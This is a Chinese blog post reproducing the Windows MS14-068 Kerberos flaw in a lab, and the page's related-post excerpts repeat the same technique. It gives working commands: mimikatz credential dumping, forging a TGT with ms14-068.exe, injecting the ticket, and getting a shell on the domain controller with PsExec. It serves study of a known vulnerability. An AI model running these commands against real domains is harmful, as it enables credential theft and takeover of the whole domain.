MS14-068 漏洞复现

已于 2022-04-20 17:40:33 修改
阅读量889 收藏 1
点赞数 1
分类专栏: 内网渗透学习笔记 漏洞复现 文章标签: 安全 网络安全
于 2022-03-24 11:41:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44110340/article/details/123706035
版权

0x00 漏洞成因

MS14-068 是密钥分发中心(KDC)服务中的Windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC(表示所有用户权限的结构)。该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。用户可以通过呈现具有改变的PAC的Kerberos TGT来获得票证
简单来说就是:
windows域中使用kerberos协议过程中,为了让SS服务器判断Client是否有权限访问服务,引入了PAC机制。构造PAC也是这个漏洞的根本。

  1. 在请求AS时,将require_PAC设置成False。
  2. 在请求TGS时,构造PAC,然后使用MD5签名(PAC尾部的签名算法可以任意指定),PAC并没有放在TGT中发送,而是在请求包的其他位置(但是还是可以解析)。
  3. TGS_REP返回的不是会话密钥,而是返回的带PAC的TGT(微软的锅)

0x01 漏洞复现

win7 域内主机
windows 2008 R2 域控

收集域信息 (获取一台域内主机权限)

上传 mimikatz.ex到 win7
获取用户名密码
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt
得到一个 域内用户 box\box 和密码
在这里插入图片描述
切换到域用户
收集域信息 和 查询域控
net config workstation
nltest /dsgetdc:box
在这里插入图片描述
获取SID
在这里插入图片描述

漏洞复现

清空票据
mimikatz # kerberos::purge 清空票据
在这里插入图片描述

上传 ms14-068漏洞利用工具
使用方法:
ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址

伪造TGT和Logon Session Key
ms14-068.exe -u box@box.com -p 123.com -s SID -d DC-2008R2.box.com
在这里插入图片描述
在这里插入图片描述

导入票据
mimikatz # kerberos::ptc 票据文件地址
在这里插入图片描述
验证 直接访问域控资源
在这里插入图片描述
Psexec 获取 cmd shell
在这里插入图片描述

仅用于学习交流,不得用于非法用途
如侵权请私聊博主删文

半只特立独行的猪
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透(四十)之横向移动篇-ms14-068传递获取域管横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-18 709
ms14-068漏洞主要通过伪造域管的TGT,将普通用户权限提权为域管权限,以此来控制域控。只要服务器未打ms14-068补丁(KB3011780),在server 2000以上的域控服务器中,都可进行利用这里就涉及到了我们之前所讲的PAC这个东西了,我们在关于 Kerberos 认证流程的介绍中提到了 PAC(Privilege Attribute Certificate)这个东西,这是微软为了访问控制而引进的一个扩展,即特权访问证书。
域渗透之MS14-068(CVE-2014-6324)
谢公子的博客
06-24 6165
在做域渗透测试时,当我们拿到了一个普通域成员的账号后,想继续对该域进行渗透,拿到域控服务器权限。如果域控服务器存在MS14_068漏洞,并且未打补丁,那么我们就可以利用MS14_068快速获得域控服务器权限。 MS14-068编号CVE-2014-6324,补丁为3011780,如果自检可在域控制器上使用命令检测。 systeminfo |find "3011780" 如下,为空说明该服务...
域内提权之MS14-068
good good study
03-17 4680
目标:普通域成员——>域管理员 漏洞利用前提 域控没有打MS14-068的补丁(KB3011780) 拿下一台加入域的计算机 有这台域内计算机的域用户密码和Sid 漏洞 环境: win2012(192.168.10.2) 域控,开启了防火墙 win7(192.168.10.5),域成员 1. win7获取域账户的密码及sid值 win7机器上查看域管理员,可发,并没有自己 这里使用mimikatz去抓取域用户的明文密码 mimikatz.exe "privilege:....
MS14-068漏洞
一纸荒芜的博客
08-26 3213
ms14-068漏洞
MS14-064/CVE-2014-6332漏洞(OLE远程代码执行漏洞、IE浏览器漏洞
最新发布
m0_74168970的博客
04-24 363
MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution,主要利用IE浏览器漏洞,Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,用户使用Internet Explorer浏览器查看该网站的时允许远程执行代码。show options:查看需要设置的地方。
【网络安全】企业内网中的横向移动
HBohan的博客
08-25 1460
横向移动,是攻击者侵入企业系统时,获取相关权限及重要数据的常见攻击手法。了解横向移动的原理有助于个人和企业更好地维护网络安全。 中安网星特此推出了横向移动科普系列,本系列共有三篇文章,我们会以简单轻松的话语为大家讲解横向移动的内容。 近年来,随着网络攻击、勒索事件频发,企业安全防护需求迅速上升,传统安全防护中以密码和权限管理为核心的单一防护模式愈发不能满足目前的网络安全环境。因而,深入了解攻击思路,“对症下药”,是目前网络安全行业发展的重要方向。 本篇文章将就“横向移动”这一典型攻击行为进行简单阐述,从攻击
MS14-068(域提权)漏洞
weixin_50985113的博客
06-29 735
这里便用到了我们之前所讲到的 PAC 这个东西,PAC 是用来验证 Client 的访问权限的,它会被TGT 里发送给 Client,然后由 Client 发送给 TGS。但也恰恰是这个 PAC 造成了 MS14-068 这个漏洞。该漏洞是位于 kdcsvc.dll 域控制器的密钥分发中心(KDC)服务中的 Windows 漏洞,它允许经过身份验证的用户在其获得的票证 TGT 中插入任意的 PAC。普通用户可以通过呈具有改变了 PAC 的 TGT 来伪造票据获得管理员权限。
MS14-068
这里是Y.lin的博客,目前是一名网络安全专业的学生,希望和师傅们一起进步吧!
05-23 530
MS14-068
MS14-068域渗透
bailandawang123的博客
03-10 426
ms14068主要是通过伪造域管的tgt,将普通用户提升为域管用户,从而控制域控。
ms14-068利用工具包.zip
07-01
"minikataz"是一个提及的64位程序,很可能是一个轻量级的Kerberos模拟环境或测试工具,用于在安全环境中MS14-068漏洞。它可能帮助研究人员或安全专家在受控环境下理解漏洞的工作原理,测试修措施,或者验证...
ms04011漏洞利用工具
06-10
ms04011漏洞的利用工具包! 包含文件DSScan.exe,getos.exe,ms04011.exe,sbaanetapi.dll.
MS14-068AD域提权神器
05-24
本地WINDOWS: 1.python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local user-a-1@dom-a.loc位域用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号SID dc-a-2003.dom-a.local域这机全名 可以通过:1)wmic useraccount where name=”USERNAME” get sid 2)whoami /all 本机可以直接查出自己的SID; 用法国神器破解,需要时最新版本的才支持, 2.mimikatz.exe log "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit TGT_user-a-1@dom-a.loc.ccache指的是第一步所生成的ccache文件。 3. kerberos::ptc TGT_secpulse@secpulse.local.ccache 4.查看: klist net use \\DC2.secpulse.local\admin$ //注:使用IP可能会失败 dir \\DC2.secpulse.local\c$ 看看有木有权限 好运~
Kerberos协议认证
weixin_44216796的博客
01-03 623
域环境 由于Kerberos主要是用在域环境下的身份认证协议,所以在说之前先说下域环境的一些概念。首先域的产生为了解决企业内部的资源管理问题,比如一个公司就可以在网络中建立一个域环境,更方便内部的资源管理。在一个域中有域控、域管理员、普通用户、主机等等各种资源。 在下图中YUNYING.LAB为其他两个域的根域,NEWS.YUNYING.LAB 和DEV.YUNYING.LAB均为YUNYING.LAB的子域,这三个域组成了一个域树。子域的概念可以理解为一个集团在不同业务上分公司,他们有业务重合的点并且都属
ms14-068的深入分析
zz_strive_2012的专栏
06-17 5078
0×0 背景 初次认识该漏洞是在FreeBuf上对该漏洞的预警《漏洞预警:系统权限提升漏洞(CVE-2014-6324)影响全版本Windows服务器》: 微软今天(2014-11-18)发布了一个紧急补丁,修了一个影响全部版本Windows服务器的严重漏洞。今天发布的MS14-068漏洞补丁用于解决Microsoft Windows Kerberos KDC漏洞(CVE-2014-
MS14-068漏洞
HoYim
04-21 1881
漏洞概述:该漏洞允许黑客提升任意普通用户权限成为域管理员(Domain Admin)身份。也就是说,你在一台普通域用户的机器上利用这个漏洞,那么这个域用户就变成域管理员权限,然后该域用户就可以控制整个域的所有机器了。 影响版本:全部版本Windows服务器 环境: 域— abc.com 域控:win 2008 R2 192.168.113.111 域内主机:win 7 192.1...
ms14-064漏洞停滞在Sending exploit
06-12
我理解你的问题是想要 MS14-064 漏洞,但是在发送 exploit 时遇到了问题,出了停滞的情况。 首先,MS14-064 是一个由 Microsoft 发布的安全公告,涉及的漏洞编号为 CVE-2014-6324,它存在于 Windows Object ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值